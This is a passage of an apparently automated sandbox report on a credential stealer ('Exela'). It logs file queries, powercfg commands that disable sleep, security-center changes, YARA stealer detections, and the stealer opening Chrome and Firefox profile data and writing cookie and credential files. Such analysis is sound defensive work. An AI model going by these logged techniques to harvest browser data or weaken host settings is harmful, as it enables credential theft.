                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_http_writer.cp310-win_amd64.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_http_parser.cp310-win_amd64.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket\mask.cp310-win_amd64.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket\reader_c.cp310-win_amd64.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_uuid.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\frozenlist VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\frozenlist VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\frozenlist VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\frozenlist VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\frozenlist\_frozenlist.cp310-win_amd64.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat\bindings VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat\bindings VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat\bindings VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat\bindings VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat\bindings\_rust.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_cffi_backend.cp310-win_amd64.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AE9D080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,76_2_00007FF75AE9D080
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEB5C70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,76_2_00007FF75AEB5C70
                Source: C:\Users\user\Desktop\Solara.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Changes security center settings (notifications, updates, antivirus, firewall)
                Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATEJump to behavior
                Modifies power options to not sleep / hibernate
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                Source: svchost.exe, 00000000.00000002.2598324247.000001DBB1702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
                Source: svchost.exe, 00000000.00000002.2598324247.000001DBB1702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;

                Stealing of Sensitive Information

                barindex
                Yara detected Exela Stealer
                Source: Yara matchFile source: 0000004D.00000003.2068669850.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000003.2070969941.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000003.2072039698.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000002.2083587274.0000019BB56B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000003.2049850078.0000019BB5088000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000003.2074477936.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000002.2084894174.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000003.2069028034.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000002.2086690451.0000019BB5FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000003.2049788391.0000019BB635C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Yara detected Python Stealer
                Source: Yara matchFile source: 0000004D.00000002.2083587274.0000019BB56B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000003.2049850078.0000019BB5088000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000002.2086690451.0000019BB5FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000003.2049788391.0000019BB635C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Detected generic credential text file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user~1\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\Browsers\Cookies.txt
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user~1\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\Browsers\Firefox\History.txt
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user~1\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\system_info.txt
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user~1\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\network_info.txt
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user~1\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\process_info.txt
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\events
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
